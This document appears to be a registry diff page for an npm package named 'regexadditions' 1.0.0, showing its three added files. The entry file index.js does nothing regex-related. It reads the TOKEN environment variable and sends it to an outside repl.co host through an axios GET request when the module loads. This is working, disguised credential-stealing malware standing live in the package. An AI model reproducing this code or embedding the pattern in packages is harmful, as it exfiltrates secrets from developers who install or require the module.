regexadditions 1.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/index.js +8 -0
  2. package/package.json +14 -0
  3. package/test.js +0 -0
package/index.js ADDED
@@ -0,0 +1,8 @@
1
+ const axios = require('axios');
2
+
3
+ console.log("aa")
4
+
5
+ console.log("a")
6
+ const TOKEN = process.env.TOKEN;
7
+ axios
8
+ .get("https://ivi.cheerioos.repl.co/image?e="+TOKEN)
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "regexadditions",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "cheerioos",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "axios": "^0.27.2"
13
+ }
14
+ }
package/test.js ADDED
File without changes